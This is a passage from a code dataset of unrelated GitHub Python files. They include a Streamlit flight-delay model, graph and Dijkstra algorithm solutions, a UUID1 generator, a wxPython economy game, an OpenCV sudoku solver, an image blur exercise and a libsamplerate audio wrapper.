pred\nfrom datatable import dt, f\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport organizing.data_organize as org\nimport organizing.plotting as pl\nimport linear_model.ransac_model as rm\nimport organizing.cleaningNaN as clean\nimport linear_model.standarderror as stde\nimport pandas as pd\n\nlink = \"../Data/2018_2022_24.csv\"\ndata = org.organize(link, False)\ncode = [\"ATL\", \"CSG\", \"ABY\", \"VLD\", \"BQK\", \"SAV\", \"AGS\"]\nairports_sigla = [\"Atlanta\", \"Columbus\", \"Sur Oeste Regional\",\n \"Valdosta\", \"Brunswick Golden\", \"Savannah/Hilton\",\n \"Regional Augusta\"]\nstyle = [\"Observar modelo\",\"Predecir\"]\nprint(data.head())\nestilo = st.sidebar.selectbox(\"¿Qué desea hacer?\", style)\ntipo = st.sidebar.selectbox(\"Seleccione el aeropuerto:\", airports_sigla)\ndata_selected = org.select_specific(data, f.DEST,\n code[airports_sigla.index(tipo)])\nif estilo == style[0]:\n st.header(\"MODELO DEL AEROPUERTO\")\n st.header(tipo)\nelif estilo == style[1]:\n st.header(\"PREDICCIÓN DE RETRASO DE ATERIZAJE EN EL AEROPUERTO\")\n st.header(tipo)\nst.write(\"Cantidad de datos de\",tipo, \"es de\", data_selected.shape[0], \"Datos.\")\n\n\nX, Y = clean.clean(data_selected[\"DEP_DELAY\"].to_list(),\n data_selected[\"ARR_DELAY\"].to_list())\nmodel = rm.model_linear(X, Y)\n\nwhile (model.score(X, Y) < 0.9):\n model = rm.model_linear(X, Y)\n\nst.write(\"La precisión del retraso de vuelo de llegada es del \",\n round(model.score(X, Y)*100,1), \"% de las veces.\")\n\nberror, merror = stde.standarderror(X, Y, model)\nm = model.estimator_.coef_[0][0]\nb = model.estimator_.intercept_[0]\nif estilo == style[0]:\n grap.graficar(X,Y,m,merror,b,berror)\nelif estilo == style[1]:\n pred.predecir(m,b,merror,berror)\n","repo_name":"Juanita1345/PF-G09","sub_path":"Codes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17381541152","text":"#Problem : 2016 Qualifiers - Travel to the West\r\n#Language : Python 3\r\n#Compiled Using : py_compile\r\n#Version : Python 3.4.3\r\n#Input for your program will be provided from STDIN\r\n#Print out all output from your program to STDOUT\r\n\r\nimport sys\r\n\r\nN = int(input())\r\nairToDest = {} # il grafo, considerato NON ORIENTATO\r\nvisited = {}\r\nfor n in range(N):\r\n couple = input().split()\r\n if couple[0] not in airToDest:\r\n airToDest[couple[0]] = [couple[1]]\r\n else:\r\n airToDest[couple[0]].append(couple[1])\r\n if couple[1] not in airToDest:\r\n airToDest[couple[1]] = []\r\n visited[couple[0]] = 0\r\n visited[couple[1]] = 0\r\n \r\n \r\n\r\npaths = 0\r\ndef solve(graph, currAir, N, visited):\r\n global paths\r\n visited[currAir] = 1\r\n if currAir == \"SFO\":\r\n paths += 1\r\n return\r\n for dest in airToDest[currAir]:\r\n if not visited[dest]:\r\n solve(graph, dest, N, visited.copy()) # ATTENZIONE, UNA COPIA DI VISITED?\r\n \r\nsolve(airToDest, \"JFK\", N, visited)\r\nprint(paths)\r\n","repo_name":"FiorixF1/bloomberg-codecon","sub_path":"Challenger Series/Travel to the West.py","file_name":"Travel to the West.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"9656305004","text":"import random\nimport sys\nimport socket\nimport hashlib\nfrom datetime import datetime\n\ndef make_node():\n\n\t# The RFC4122 spec says that if it's not possible to get the MAC addresses of the host\n\t# one option is to take as many information that identify this node and hash them together.\n\t# The IP address of the node is useful for this purpouse.\n\tip_address = [(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]\n\t\t\t\n\thash = md5_hash(ip_address)\n\tnode = 0\n\tfor i in range(min(6, len(hash))):\n\t\tif type(hash[i]) is int:\n\t\t\tnode |= (0x00000000000000ff & hash[i]) << (5 - i) * 8\n\t\telse:\n\t\t\tnode |= (0x00000000000000ff & ord(hash[i])) << (5 - i) * 8\n\n\t# As we don't use the mac address, the multicast bit must be 1\n\treturn node | 0x0000010000000000\n\t\ndef md5_hash(ip_address):\n\thash = hashlib.md5()\n\thash.update(ip_address.encode('utf-8'))\t\t\n\treturn hash.digest()\t\n\t\ndef digits(value, bytes_nr):\n return value & digits_masks[bytes_nr]\n\t\ndef datetime_to_nanos(dt):\n\tdelta = dt - epoch\n\treturn (delta.days * 86400 + delta.seconds) * 10000000 + (delta.microseconds * 10)\n\t\ndef get_time_based_blocks(dt, nanos_to_add):\n\n\t# Convert millis to nanos\n\tnanos = datetime_to_nanos(dt)\n \n\t# Add random nanoseconds\n\tif (nanos_to_add > 0):\n\t\tnanos += nanos_to_add\n\t\t\n\treturn digits(nanos >> 32, 8), digits(nanos >> 16, 4), digits(nanos, 4)\n\ndef get_clock_seq_and_node():\n\n\tclock = random.randint(0, sys.maxsize)\t\n\tclock_seq_and_node = 0\n\tclock_seq_and_node |= 0x8000000000000000 # Variant\n\tclock_seq_and_node |= (clock & 0x0000000000003FFF) << 48\n\tclock_seq_and_node |= _node\n\n\treturn digits(clock_seq_and_node >> 56, 2), digits(clock_seq_and_node >> 48, 2), digits(clock_seq_and_node, 12)\n\t\n_node = make_node()\nepoch = datetime(1970, 1, 1)\ndigits_masks = { 2: 0xFF, 4: 0xFFFF, 8: 0xFFFFFFFF, 12: 0xFFFFFFFFFFFF }","repo_name":"dive-tv/python-uuid1","sub_path":"uuid1/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7189940698","text":"# 1916. 최소비용 구하기\n\ndef dijkstra(start):\n DP[start] = 0 # 시작 비용 0으로\n heap = []\n heapq.heappush(heap, [0, start]) # heapq는 작은 것 순서대로 정렬함(따라서 (비용, node)에서 순서 바꾸면 안됨)\n while heap: # heap이 없을 때까지\n node_cost, node = heapq.heappop(heap)\n if DP[node] < node_cost: # 시작지점에서 해당 node값으로 이동하는 비용이 기존 DP값보다 큰 경우\n continue # 아래 for문 안 돌음\n for next, cost in bus[node]: # 해당 node에서 이동할 수 있는 것 반복\n next_cost = node_cost + cost # 현재 노드까지 비용 + 다음 노드로 이동 비용\n if DP[next] > next_cost: # 현재 노드에서 이동한 비용이 다음 노드의 비용보다 작은 경우\n DP[next] = next_cost # 비용 변경\n heapq.heappush(heap, [next_cost, next]) # 다음 노드 저장\n\nimport sys\nimport heapq\n\nsys.setrecursionlimit(10**6)\ninput = sys.stdin.readline\nN = int(input())\nM = int(input())\nbus = [[] for _ in range(N+1)]\nDP = [10**8 for _ in range(N+1)] # 비용을 저장하는데 다익스트라 알고리즘이므로 최대값으로 초기화(최대 node 1000개, 최대 비용 100000이므로 10*8으로 설정)\n\nfor _ in range(M):\n x, y, c = map(int, input().split())\n bus[x].append([y, c]) # 다익스트라를 위해 x에 [y, c]를 저장\n\nfirst, last = map(int, input().split())\n\ndijkstra(first) # 시작 지점부터 시작\nprint(DP[last])","repo_name":"Yookaser/Algorithm","sub_path":"Backjoon/11_G5/bj1916.py","file_name":"bj1916.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8689562045","text":"# cook your dish here\nfor _ in range(int(input())):\n n=int(input())\n lst=list(map(int,input().split()))\n ans=list()\n nm=0\n for i in range(n):\n if i==0:\n nm=lst[0]&lst[1]\n elif i==(n-1):\n nm=lst[i]&lst[i-1]\n else:\n nm=max(lst[i]&lst[i-1],lst[i]&lst[i+1])\n ans.append(nm)\n print(*ans)","repo_name":"dhruv-gautam16/Code_Chef-Contest-","sub_path":"MAXDMGE.py","file_name":"MAXDMGE.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"fa","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"30199439574","text":"from setuptools import setup\n\nimport os\n\n\ndef is_package(path):\n return (\n os.path.isdir(path) and\n os.path.isfile(os.path.join(path, '__init__.py'))\n )\n\n\ndef find_packages(path, base=\"\" ):\n \"\"\" Find all packages in path \"\"\"\n packages = {}\n for item in os.listdir(path):\n dir = os.path.join(path, item)\n if is_package( dir ):\n if base:\n module_name = \"%(base)s.%(item)s\" % vars()\n else:\n module_name = item\n packages[module_name] = dir\n packages.update(find_packages(dir, module_name))\n return packages\n\n\ndef read_requirements(filename):\n \"\"\"\n Get application requirements from\n the requirements.txt file.\n :return: Python requirements\n :rtype: list\n \"\"\"\n with open(filename, 'r') as req:\n requirements = req.readlines()\n install_requires = [r.strip() for r in requirements if r.find('git+') != 0]\n return install_requires\n\n\ndef read(filepath):\n \"\"\"\n Read the contents from a file.\n :param str filepath: path to the file to be read\n :return: file contents\n :rtype: str\n \"\"\"\n with open(filepath, 'r') as f:\n content = f.read()\n return content\n\n\npackages = find_packages(\".\")\nrequirements = read_requirements('requirements/prod.txt')\n\n\nsetup(\n name='colin_api',\n packages=find_packages('src'),\n package_dir={'': 'src'},\n include_package_data=True,\n license=read('LICENSE'),\n long_description =read('README.md'),\n install_requires=requirements,\n setup_requires=[\n 'pytest-runner',\n ],\n tests_require=[\n 'pytest',\n ],\n)\n","repo_name":"bcgov/lear","sub_path":"colin-api/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"6586371951","text":"'''\n类定义文件\n用于定义类\n'''\nimport wx\nimport random\nimport winsound\n\nimport var\n\n\n\n\nclass factory(object):\n '''一个unit的控件集合类'''\n def __init__(self,panel,类型,产量 = 10):\n #self.工人数 = 0 #本来应该是unit的属性,但是为了方便按钮事件,设为unit的gui的属性\n\n self.__单人产量 = 产量 # 单位产出\n self.grid = wx.GridBagSizer(2,2) \n self.panel = ''\n 名称 = 'F_' +类型\n self.信息={'资金':0,'类型':类型,'名称':名称, '储量':0,'人工':0}\n self.pf=var.pf[var.产品列表.index(类型)]\n\n def __创建label(self,panel,txt='txt',宽度=90,字体=20,颜色='#FFFFFF'):\n temp = wx.StaticText(panel, label=txt,size=(宽度,-1),style=wx.ALIGN_CENTRE)\n temp.SetBackgroundColour(颜色)\n font = wx.Font(字体,wx.FONTFAMILY_DEFAULT,wx.FONTSTYLE_NORMAL,wx.FONTWEIGHT_NORMAL)\n temp.SetFont(font)\n return temp\n\n\n def sub预算(self):\n # 被购买\n var.buy[self.信息['类型']] = self.get今日购买()\n print('buy',var.buy)\n # 生产\n var.out[self.信息['类型']] = self.__单人产量 * self.信息['人工']\n var.price[self.信息['类型']] = self.get今日价格()\n\n def sub结算(self):\n t = self.信息['类型']\n #for i in var.产品列表:\n # 购买\n # self.信息['资金'] -= var.buy[i] * var.price[i]\n # var.单位列表[var.产品列表.index(i)].信息['资金'] += var.buy[i] * var.price[i]\n self.信息['资金'] += self.get购买花费()\n self.信息['储量'] -= var.buy[t]\n # 生产\n self.信息['储量'] += var.out[self.信息['类型']]\n self.信息['资金'] += var.buy[t]* var.price[t]\n\n def addCtrls(self,panel):\n # row 1\n grid = self.grid\n\n self.head = self.__创建label(panel,\" \"+self.信息['类型'])\n grid.Add(self.head, pos=(0, 0),span=(1,4), flag=wx.EXPAND)\n #row 2\n self.w1 = self.__创建label(panel,\"worker\")\n self.w1.SetBackgroundColour('#FFFFFF')\n grid.Add(self.w1, pos=(1, 0), flag=wx.EXPAND)\n self.w2 = wx.StaticText(panel, label=\" 0\")\n self.w2.SetBackgroundColour('#FFFFFF')\n grid.Add(self.w2, pos=(1, 1), flag=wx.EXPAND)\n self.bt1 = wx.Button(panel, label=\"增加\")\n grid.Add(self.bt1, pos=(1, 2), flag=wx.EXPAND)\n self.bt1.Bind(wx.EVT_BUTTON, self.event)\n self.bt2 = wx.Button(panel, label=\"减少\")\n grid.Add(self.bt2, pos=(1, 3), flag=wx.EXPAND | wx.ALL)\n self.bt2.Bind(wx.EVT_BUTTON, self.event)\n # row 3\n self.r3_1 = wx.StaticText(panel, label=\"money :\")\n self.r3_1.SetBackgroundColour('#FFFFFF')\n grid.Add(self.r3_1, pos=(2, 0), flag=wx.EXPAND)\n self.r3_2 = wx.StaticText(panel, label=str(self.信息['资金']))\n self.r3_2.SetBackgroundColour('#FFFFFF')\n grid.Add(self.r3_2, pos=(2, 1), flag= wx.ALL)\n \n #########################\n # 右侧 绘图窗口\n image = wx.Image(\"捕获.png\")\n temp = image.Scale(100,100).ConvertToBitmap() # 缩放并转换为bitmap\n self.panel = wx.StaticBitmap(parent=panel,bitmap=temp,size=(100,100))\n #self.panel = wx.Panel(panel,size=(200,200))\n self.panel.SetBackgroundColour('#00aaaa')\n grid.Add(self.panel, pos=(0, 4),span=(3,1), border=10)\n self.w2.SetBackgroundColour('#00aaaa')\n \n def event(self,e):\n '''按钮事件,增加 1名worker'''\n if e.GetEventObject().Label == '增加' :\n self.信息['人工'] += 1\n else:\n self.信息['人工'] -= 1\n self.w2.SetLabel(str(self.信息['人工']))\n\n winsound.Beep(1500, 50) #(频率,持续时间)\n self.panel.Refresh()\n \n\n def get今日价格(self):\n return 1#random.randint(1,50)\n\n def get净利润(self):\n i = self.信息['类型']\n return (var.out[i] +var.buy[i])* var.price[i] + self.get购买花费()\n\n def get今日购买(self):\n rv = 0\n _id = var.产品列表.index(self.信息['类型'])\n for i in var.单位列表:\n # 计算每个单位需要的t 的量,然后累加\n try:\n rv += i.pf[self.信息['类型']] * i.信息['人工']\n except:\n rv += 0\n #print('ren',i.信息['人工'])\n return rv\n def get购买花费(self):\n l = list(self.pf.keys())\n rv=0\n for i in l:\n rv -= self.pf[i] *self.信息['人工']\n return rv\n\n def get净资产(self):\n return self.信息['资金'] + self.信息['储量']* var.price[self.信息['类型']]\n\n def get信息(self):\n #,'今日价格','购买花费'\n rv = []\n i = self.信息['类型']\n self.信息.update({ '产量':var.out[i] })\n self.信息.update({'出售':var.buy[self.信息['类型']]})\n self.信息.update({'今日价格':self.get今日价格()})\n self.信息.update({'购买花费':self.get购买花费() })\n self.信息.update({'今日产值':var.out[i] * var.price[i]})\n self.信息.update({ '净利润':self.get净利润() })\n self.信息.update({ '净资产': self. get净资产()})\n for i in var.信息表[0]:\n rv.append(self.信息[i])\n return rv\n\n def refresh(self):\n self.sub结算()\n self.sub预算()\n print('refresh ')\n #row 2\n self.w2.SetLabel(str(self.信息['人工']))\n # row 3\n self.r3_2.SetLabel(str(self.信息['资金'])) \n #########################\n # 右侧 绘图窗口\n image = wx.Image(\"捕获.png\")\n temp = image.Scale(100,100).ConvertToBitmap() # 缩放并转换为bitmap\n c='#'\n c += '{:0>2x}'.format(random.randint(0,255))\n c += '{:0>2x}'.format(random.randint(0,255))\n c += '{:0>2x}'.format(random.randint(0,255))\n c=wx.Colour(random.randint(0,255),random.randint(0,255),random.randint(0,255))\n print('color',c)\n self.w1.Refresh()\n self.w1.SetBackgroundColour(c)\n self.w2.SetBackgroundColour(c) \n self.panel.SetBackgroundColour(c)","repo_name":"bmzk/sim-game","sub_path":"MyClass.py","file_name":"MyClass.py","file_ext":"py","file_size_in_byte":6290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74586935505","text":"class Solution:\n def sortedSquares(self, nums: List[int]) -> List[int]:\n left, right = 0, len(nums) - 1\n highest_square_idx = len(nums) - 1\n squares = [None] * len(nums)\n\n while left <= right:\n left_square = nums[left] * nums[left]\n right_square = nums[right] * nums[right]\n\n # Since it's sorted, we can use highest_square_idx\n # to place at the end to get our intended order\n if left_square > right_square:\n squares[highest_square_idx] = left_square\n left += 1\n else:\n squares[highest_square_idx] = right_square\n right -= 1\n\n highest_square_idx -= 1\n\n return squares\n\n# Time Complexity: O(n) since we iterate it once only\n\n# Space Complexity: O(n) this space is used up in the output array","repo_name":"garzeah/algorithms","sub_path":"general/two_pointers/squares_of_a_sorted_array.py","file_name":"squares_of_a_sorted_array.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40928703483","text":"print('Setting Up')\r\nimport os\r\n\r\nos.environ['TFF_CPP_MIN_LOG_LEVEL'] = '3' # TO get rid of the tensorflow warnings\r\n\r\nfrom utlis import *\r\nimport sudokusolver\r\n\r\npathImage = \"1.jpg\"\r\nheightImg = 450\r\nwidthImg = 450\r\n\r\nmodel = initializePredictionModel() # Load the CNN Model\r\n\r\n# 1. Preparing the Image\r\n\r\nimg = cv2.imread(pathImage)\r\nimg = cv2.resize(img, (heightImg, widthImg)) # resizing the image\r\nimgBlank = np.zeros((heightImg, widthImg, 3), np.uint8) # Create a blank image for testing debugging\r\nimgThreshold = preProcess(img)\r\n\r\n# 2. Find the Contours\r\n\r\nimgContours = img.copy() # Copy Image for Display Purposes (Will contain all the contours)\r\nimgBigContour = img.copy() # Copy Image for Display Purposes (Will contain the biggest contour)\r\ncontours, hierarchy = cv2.findContours(imgThreshold, cv2.RETR_EXTERNAL,\r\n cv2.CHAIN_APPROX_SIMPLE) # Find all the contours\r\ncv2.drawContours(imgContours, contours, -1, (0, 255, 0), 3) # Draw all the detected contours\r\n\r\n# 3. Find the largest contour and use it as our Sudoku Puzzle\r\nbiggest, maxArea = biggestContour(contours)\r\nif biggest.size != 0:\r\n biggest = reorder(biggest)\r\n cv2.drawContours(imgBigContour, biggest, -1, (0, 0, 255), 25) # draw the biggest contour\r\n pts1 = np.float32(biggest) # prepare points for WARP\r\n pts2 = np.float32([[0, 0], [widthImg, 0], [0, heightImg], [widthImg, heightImg]]) # prepare points\r\n matrix = cv2.getPerspectiveTransform(pts1, pts2) # GER\r\n imgWarpColored = cv2.warpPerspective(img, matrix, (widthImg, heightImg))\r\n imgDetectedDigits = imgBlank.copy()\r\n imgWarpColored = cv2.cvtColor(imgWarpColored, cv2.COLOR_BGR2GRAY)\r\n\r\n # 4. Split the image and find each digit available (Digit Detection)\r\n imgSolvedDigits = imgBlank.copy()\r\n boxes = splitBoxes(imgWarpColored)\r\n numbers = getPrediction(boxes, model)\r\n imgDetectedDigits = displayNumbers(imgDetectedDigits, numbers, color=(255, 0, 255))\r\n # cv2.imshow(\"v\", imgDetectedDigits)\r\n numbers = np.asarray(numbers)\r\n # print(numbers)\r\n posArray = np.where(numbers > 0, 0,1) # This places '1' in the empty places and '0' in the places where we have numbers (FOR OUR BOARD)\r\n # print(posArray)\r\n\r\n # FIND SOLUTION OF THE BOARD\r\n board = np.array_split(numbers, 9)\r\n\r\n try:\r\n sudokusolver.solve(board)\r\n except:\r\n pass\r\n #print(board)\r\n flatlist=[] #to get the solved values in a single list , the way we have been dealing with\r\n for sublist in board:\r\n for item in sublist:\r\n flatlist.append(item)\r\n solvedNumbers = flatlist*posArray #to get only the solved values in sudoku puzzle and not the original values(only the values which are new)\r\n #print(solvedNumbers)\r\n imgSolvedDigits = displayNumbers(imgSolvedDigits, solvedNumbers)\r\n\r\n #Overlay Solution\r\n\r\n #(Here First We apply Inverse WARP Perspective to get place the solved numbers on the original image's perspective and then overlay it on the original image))\r\n pts2=np.float32(biggest) #Prepare points for WARP\r\n pts1=np.float32([[0, 0], [widthImg, 0], [0, heightImg], [widthImg, heightImg]]) # prepare points\r\n matrix=cv2.getPerspectiveTransform(pts1,pts2) #GER (Inverse Matrix)\r\n imgInvWarpColored=img.copy()\r\n imgInvWarpColored=cv2.warpPerspective(imgSolvedDigits,matrix,(widthImg,heightImg))\r\n inv_perspective=cv2.addWeighted(imgInvWarpColored,1,img,0.5,1)\r\n imgDetectedDigits=drawGrid(imgDetectedDigits)\r\n imgSolvedDigits=drawGrid(imgSolvedDigits)\r\n\r\nimgArray=([img,imgThreshold,imgContours,imgBigContour],\r\n [imgDetectedDigits,imgSolvedDigits,imgInvWarpColored,inv_perspective])\r\nstackedImage=stackImages(imgArray,1)\r\nstackedImage=cv2.resize(stackedImage, (700,450), interpolation = cv2.INTER_AREA)\r\ncv2.imshow(\"stacked Images\",stackedImage)\r\n\r\n\r\n\r\n\r\ncv2.waitKey(0)\r\n","repo_name":"dhruvshah116/Python-OpevCV-Sudoku-Solver","sub_path":"sudokumain.py","file_name":"sudokumain.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22997723070","text":"import subprocess\nimport json\nimport sys\nimport argparse\n\n\ndef runtime_objects():\n parser = argparse.ArgumentParser(description='Pypillar argument processing')\n parser.add_argument('--PYPILLAR', help='Variable which contain all pypillar objects for future references.')\n args = parser.parse_args()\n return json.loads(args.PYPILLAR)\n\nclass Worker:\n def __init__(self, tasks, post_data, request_id):\n self.tasks = tasks\n self.post_data = post_data\n self.request_id = request_id\n self.task_input = {}\n self.output = None\n self.error = {}\n self.data = {}\n self.sys_error = False\n\n def run(self):\n for rule in self.tasks:\n try:\n self.data['PYPILLAR_TASK_INFO'] = rule\n self.data['PYPILLAR_POST_DATA_FILE'] = self.post_data\n self.data['PYPILLAR_UNIQUE_REQUEST_ID'] = self.request_id\n self.data['PYPILLAR_TASK_INPUT'] = self.task_input\n\n command = [sys.executable, rule['script'], '--PYPILLAR', json.dumps(self.data)]\n runtime_log = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True, universal_newlines=True)\n\n with open(rule['task_log_path'], \"w+\") as outfile:\n outfile.write(runtime_log)\n\n try:\n runtime_log = json.loads(runtime_log)\n if runtime_log.get('PYPILLAR_TASK_INPUT'):\n self.task_input = runtime_log['PYPILLAR_TASK_INPUT']\n if runtime_log.get('PYPILLAR_RESULT'):\n self.output = runtime_log\n break\n except Exception:\n pass\n\n except subprocess.CalledProcessError as exc:\n with open(rule['task_log_path'], \"w+\") as outfile:\n outfile.write(exc.output)\n\n self.error['error'] = f'Task({rule[\"name\"]}): Failed. Check task log for more info.'\n self.sys_error = True\n break\n\n if self.sys_error:\n self.sys_error = False\n return json.dumps(self.error)\n\n elif self.output:\n return json.dumps(self.output)\n\n else:\n return json.dumps({\"PYPILLAR_RESULT\": {}})","repo_name":"washim/pypillar","sub_path":"pypillar/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21911183653","text":"\"\"\"\nFile: blur.py\nAuthor: David\n-------------------------------\nThis file shows the original image(smiley-face.png)\nfirst, and then its blurred image. The blur algorithm\nuses the average RGB values of a pixel's nearest neighbors.\n\"\"\"\n\nfrom simpleimage import SimpleImage\n\n\ndef blur(img):\n \"\"\"\n :param img: SimpleImage, the image to be blurred\n :return: SimpleImage, the blurred image\n \"\"\"\n # Create a blank frame for blurred pixels.\n blur_img = SimpleImage.blank(img.width, img.height)\n # Loop the original image.\n for x in range(img.width):\n for y in range(img.height):\n # Set up variables for pixels to be processed.\n red_total = 0\n green_total = 0\n blue_total = 0\n \"\"\"\n Because the number of pixels to be processed is not sure, \n I create a variable, count, to calculate how many pixels are added in the process. \n \"\"\"\n count = 0\n # Loop the pixels to be processed (pixels in the style box while the designated pixel at the middle)\n for x1 in range(x-1, x+2):\n for y1 in range(y-1, y+2):\n \"\"\"\n I wrote this if condition to ensure some special cases, like corners and sides,\n will not fail during the calculation.\n \"\"\"\n if 0 <= x1 < img.width and 0 <= y1 < img.height:\n img_p = img.get_pixel(x1, y1)\n count += 1\n red_total += img_p.red\n green_total += img_p.green\n blue_total += img_p.blue\n # Calculate the average of the pixels in the style box and put them into the blank frame.\n blur_img_p = blur_img.get_pixel(x, y)\n blur_img_p.red = red_total//count\n blur_img_p.green = green_total//count\n blur_img_p.blue = blue_total//count\n return blur_img\n\n\ndef main():\n \"\"\"\n This program blurs the smiley-face image.\n \"\"\"\n old_img = SimpleImage(\"images/smiley-face.png\")\n old_img.show()\n # Blur the image for 5 times.\n blurred_img = blur(old_img)\n for i in range(4):\n blurred_img = blur(blurred_img)\n blurred_img.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"YuHaoHan/MystanCodeProjects","sub_path":"stanCode_Projects/my_photoshop/blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37335939483","text":"import ctypes\nimport ctypes.util\nimport math\n\n\nSRC_SINC_BEST_QUALITY = 0\nSRC_SINC_MEDIUM_QUALITY = 1\nSRC_SINC_FASTEST = 2\nSRC_ZERO_ORDER_HOLD = 3\nSRC_LINEAR = 4\n\n\nclass SampleRate():\n\n _BUF_FRAME_COUNT = 4096\n\n def __init__(self, converter_type, channels):\n \"\"\"Create a new sample rate converter.\n\n Arguments:\n converter_type -- The converter type.\n channels -- Number of channels.\n\n \"\"\"\n self._channels = channels\n\n error = ctypes.c_int(0)\n self._state = _samplerate.src_new(converter_type, channels, ctypes.byref(error))\n if self._state == None:\n err_cstr = _samplerate.src_strerror(error)\n raise SampleRateError('Could not set up sample rate conversion: {}'.format(\n str(err_cstr, encoding='utf-8')))\n\n self._input_data = [[] for _ in range(self._channels)]\n self._allow_input = True\n\n self._in_buf = (ctypes.c_float * (self._BUF_FRAME_COUNT * self._channels))()\n self._out_buf = (ctypes.c_float * (self._BUF_FRAME_COUNT * self._channels))()\n\n self._data = _SRC_DATA(\n ctypes.cast(self._in_buf, ctypes.POINTER(ctypes.c_float)),\n ctypes.cast(self._out_buf, ctypes.POINTER(ctypes.c_float)),\n 0, 0, # input & output frames\n 0, 0, # filled by libsamplerate\n 0, # end of input\n 1.0) # ratio\n\n self._prev_orig_frame_count = 0\n self._prev_est_frame_count = 0\n self._cur_orig_frame_count = 0\n self._cur_est_frame_count = 0\n self._out_frame_count = 0\n\n def set_ratio(self, ratio, smooth=True):\n \"\"\"Set sample rate conversion ratio.\n\n Arguments:\n ratio -- The conversion ratio.\n smooth -- Use smooth transition of conversion ratio.\n\n \"\"\"\n if math.isnan(ratio) or math.isinf(ratio) or (ratio <= 0.0):\n raise ValueError('Invalid sample rate conversion ratio: {}'.format(ratio))\n\n if self._data.src_ratio != ratio:\n self._prev_orig_frame_count += self._cur_orig_frame_count\n self._prev_est_frame_count += self._cur_est_frame_count\n self._cur_orig_frame_count = 0\n self._cur_est_frame_count = 0\n\n self._data.src_ratio = ratio\n\n if not smooth:\n error = _samplerate.src_set_ratio(self._state, ratio)\n if error != 0:\n err_cstr = _samplerate.src_strerror(error)\n raise SampleRateError('Could not set new conversion ratio: {}'.format(\n str(err_cstr, encoding='utf-8')))\n\n def add_input_data(self, *data, end_of_input=True):\n \"\"\"Add input audio data to the sample rate converter.\n\n Arguments:\n data -- The input data, each channel as a separate argument.\n end_of_input -- True if data is the end of input data. It is an\n error to call this function after a previous call\n with this value set to True.\n\n \"\"\"\n if not self._allow_input:\n raise SampleRateError(\n 'More input data provided after indicating end of input')\n\n if len(data) != self._channels:\n raise ValueError('Expected {} input channels, got {}'.format(\n self._channels, len(data)))\n\n self._cur_orig_frame_count += len(data[0])\n self._cur_est_frame_count = int(\n self._cur_orig_frame_count * self._data.src_ratio)\n\n frame_count = len(data[0])\n for ch in range(self._channels):\n if len(data[ch]) != frame_count:\n raise ValueError('Input channel buffer lengths do not match')\n self._input_data[ch].extend(data[ch])\n\n if end_of_input:\n self._allow_input = False\n\n def _get_total_est_frame_count(self):\n return self._cur_est_frame_count + self._prev_est_frame_count\n\n def get_output_data(self):\n \"\"\"Get converted audio data.\n\n Return value:\n A tuple containing audio data for each channel. The returned\n audio data contains all converted data of fed input data so\n far.\n\n \"\"\"\n\n frames_left = len(self._input_data[0])\n\n cur_offset = 0\n output_data = [[] for _ in range(self._channels)]\n\n def process():\n error = _samplerate.src_process(self._state, self._data)\n if error != 0:\n err_cstr = _samplerate.src_strerror(error)\n raise SampleRateError('Error while converting data: {}'.format(\n str(err_cstr, encoding='utf-8')))\n\n def extend_output():\n generated = self._data.output_frames_gen\n self._out_frame_count += generated\n for ch in range(self._channels):\n output_data[ch].extend(self._data.data_out[\n ch : ch + self._channels * generated : self._channels])\n\n while frames_left > 0:\n orig_frame_count = min(self._BUF_FRAME_COUNT, frames_left)\n last_chunk = (not self._allow_input) and (orig_frame_count == frames_left)\n\n # Fill input buffer\n orig_item_count = self._channels * orig_frame_count\n for ch in range(self._channels):\n self._in_buf[ch : ch + orig_item_count : self._channels] = (\n self._input_data[ch][cur_offset:cur_offset + orig_frame_count])\n\n frame_count = orig_frame_count\n\n self._data.data_in = ctypes.cast(\n self._in_buf, ctypes.POINTER(ctypes.c_float))\n self._data.input_frames = frame_count\n self._data.output_frames = self._BUF_FRAME_COUNT\n self._data.input_frames_used = -1\n self._data.output_frames_gen = 0\n self._data.end_of_input = 1 if last_chunk else 0\n\n # Convert\n while frame_count > 0:\n process()\n\n # Get converted data\n extend_output()\n\n assert self._data.input_frames_used >= 0\n\n frame_count -= self._data.input_frames_used\n\n # Move input pointer forwards in case we didn't consume all input\n elem_offset = self._channels * (orig_frame_count - frame_count)\n self._data.data_in = ctypes.cast(\n ctypes.byref(\n self._in_buf, elem_offset * ctypes.sizeof(ctypes.c_float)),\n ctypes.POINTER(ctypes.c_float))\n\n self._data.input_frames = frame_count\n self._data.input_frames_used = 0\n self._data.output_frames_gen = 0\n\n cur_offset += orig_frame_count - frame_count\n frames_left -= orig_frame_count - frame_count\n\n if not self._allow_input:\n assert frames_left == 0\n\n # Make sure we get all the remaining output data\n self._in_buf[:] 